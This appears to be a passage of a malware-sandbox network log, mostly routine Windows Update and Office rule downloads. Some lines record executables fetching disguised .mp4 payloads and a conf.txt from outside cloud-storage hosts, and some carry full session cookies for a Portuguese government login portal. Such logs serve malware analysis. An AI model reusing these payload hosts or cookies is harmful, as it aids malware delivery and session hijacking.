TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/js/bootstrap/bootstrap-3.3.4.min.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/js/app.js?cb=5.2.10 HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /autentica_static/icons/favicon.ico HTTP/1.1Host: www.acesso.gov.ptConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: autentica_JSessionID=v94q-SXkLAYqAtLB6_lnQu2GvdIe4Wm7jgRnhGPyN3vr0Me0rpbc!-1109972721!1841467755; AT_P=!jpkTbJ5+N2SHod6XNCYICHCNuUpMaRiJA2aJlJ5+5tvwdf7pXWhyakT6FGhChwrLyP3Q42SGHpieYRU=; TS017b475d=01e43c52fe574d01ed8b893772efbea94ecbd5572a9ad7484fbf931cc90bae72c1718326205d41557602b18e641c96a372f1ae483a; TSbfdc4c04027=08def0a5edab200056a5209536c90ec69ae9c8e6f303eb166912766094e2d565f1b9a255d719fc8d08a28fdf63113000a35d2fbd292ce0752279a47d1500e997887622511a8e8c8eeba8334d30b9595f10dcf4420e5d025c6ad3e102f6aa9754
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rBgTCMhWGuf+1Pc&MD=RoRLZT8E HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /basketchampion.mp4 HTTP/1.1User-Agent: lspcv2.exeHost: happychristmaslegado.s3.eu-north-1.amazonaws.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /alphaville.mp4 HTTP/1.1User-Agent: place.exeHost: happychristmaslegado.s3.eu-north-1.amazonaws.comCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rBgTCMhWGuf+1Pc&MD=RoRLZT8E HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1User-Agent: ler1255.txtHost: s3.timeweb.com
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /41907bc4-chronocromdocrom/integra/conf.txt HTTP/1.1User-Agent: ler8109.txtHost: s3.timeweb.comIf-Modified-Since: Mon, 30 Oct 2023 15:08:01 GMTIf-None-Match: "8cc325c4a72b846a690145124f81749a"
Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120670v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120674v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120675v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120676v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120677v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120678v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120679v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120680v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120681v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120682v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120602v10s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120601v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224901v11s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702351v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702350v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700401v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700400v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
